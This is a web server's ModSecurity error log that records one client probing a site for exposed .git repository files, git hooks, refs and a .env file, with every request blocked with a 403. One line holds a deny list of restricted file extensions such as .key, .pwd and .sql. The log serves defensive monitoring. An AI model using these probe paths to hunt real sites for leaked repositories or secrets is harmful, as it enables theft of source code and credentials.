[Mon May 11 20:55:47.792805 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks/post-commit"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agImMzP5Q_-MBliRCAxm0wAAABM"]
[Mon May 11 20:55:47.792960 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agImMzP5Q_-MBliRCAxm0wAAABM"]
[Mon May 11 20:55:47.793171 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/post-commit"] [unique_id "agImMzP5Q_-MBliRCAxm0wAAABM"]
[Mon May 11 20:55:47.793639 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/"] [unique_id "agImM1NddpkriGUb6ZV2UQAAAQw"]
[Mon May 11 20:55:47.793784 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/"] [unique_id "agImM1NddpkriGUb6ZV2UQAAAQw"]
[Mon May 11 20:55:47.793966 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/"] [unique_id "agImM1NddpkriGUb6ZV2UQAAAQw"]
[Mon May 11 20:55:47.798179 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImMyMeXtzav-mi9SyxIgAAAM8"]
[Mon May 11 20:55:47.798331 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImMyMeXtzav-mi9SyxIgAAAM8"]
[Mon May 11 20:55:47.798526 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImMyMeXtzav-mi9SyxIgAAAM8"]
[Mon May 11 20:55:47.801597 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks"] [unique_id "agImM9eaRXe5lR8y0ZOSrwAAAUI"]
[Mon May 11 20:55:47.801749 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks"] [unique_id "agImM9eaRXe5lR8y0ZOSrwAAAUI"]
[Mon May 11 20:55:47.801932 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks"] [unique_id "agImM9eaRXe5lR8y0ZOSrwAAAUI"]
[Mon May 11 20:55:47.805250 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.project"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.project"] [unique_id "agImMzP5Q_-MBliRCAxm1AAAABI"]
[Mon May 11 20:55:47.805398 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.project"] [unique_id "agImMzP5Q_-MBliRCAxm1AAAABI"]
[Mon May 11 20:55:47.805551 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks/pre-commit"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agImM_jVc-A-CSptvm1xFAAAAEg"]
[Mon May 11 20:55:47.805588 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.project"] [unique_id "agImMzP5Q_-MBliRCAxm1AAAABI"]
[Mon May 11 20:55:47.805688 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agImM_jVc-A-CSptvm1xFAAAAEg"]
[Mon May 11 20:55:47.805852 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/hooks/pre-commit"] [unique_id "agImM_jVc-A-CSptvm1xFAAAAEg"]
[Mon May 11 20:55:47.812067 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info"] [unique_id "agImMzP5Q_-MBliRCAxm1QAAABM"]
[Mon May 11 20:55:47.812228 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info"] [unique_id "agImMzP5Q_-MBliRCAxm1QAAABM"]
[Mon May 11 20:55:47.812416 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info"] [unique_id "agImMzP5Q_-MBliRCAxm1QAAABM"]
[Mon May 11 20:55:47.819782 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/fetch_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agImMyMeXtzav-mi9SyxIwAAAM8"]
[Mon May 11 20:55:47.819976 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agImMyMeXtzav-mi9SyxIwAAAM8"]
[Mon May 11 20:55:47.820279 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/FETCH_HEAD"] [unique_id "agImMyMeXtzav-mi9SyxIwAAAM8"]
[Mon May 11 20:55:47.822239 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agImM1NddpkriGUb6ZV2UgAAARE"]
[Mon May 11 20:55:47.822386 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agImM1NddpkriGUb6ZV2UgAAARE"]
[Mon May 11 20:55:47.822566 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agImM1NddpkriGUb6ZV2UgAAARE"]
[Mon May 11 20:55:47.831319 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agImMzP5Q_-MBliRCAxm1gAAABM"]
[Mon May 11 20:55:47.831462 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agImMzP5Q_-MBliRCAxm1gAAABM"]
[Mon May 11 20:55:47.831637 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agImMzP5Q_-MBliRCAxm1gAAABM"]
[Mon May 11 20:55:47.836400 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agImM5Yn-x0CHsbEbP2tDgAAAIQ"]
[Mon May 11 20:55:47.836589 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agImM5Yn-x0CHsbEbP2tDgAAAIQ"]
[Mon May 11 20:55:47.836796 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/main"] [unique_id "agImM5Yn-x0CHsbEbP2tDgAAAIQ"]
[Mon May 11 20:55:47.942669 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/remotes/origin/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agImMyMeXtzav-mi9SyxJAAAAM4"]
[Mon May 11 20:55:47.942840 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agImMyMeXtzav-mi9SyxJAAAAM4"]
[Mon May 11 20:55:47.943043 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agImMyMeXtzav-mi9SyxJAAAAM4"]
[Mon May 11 20:55:47.958364 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.old"] [unique_id "agImMzP5Q_-MBliRCAxm1wAAAAo"]
[Mon May 11 20:55:47.958519 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.old"] [unique_id "agImMzP5Q_-MBliRCAxm1wAAAAo"]
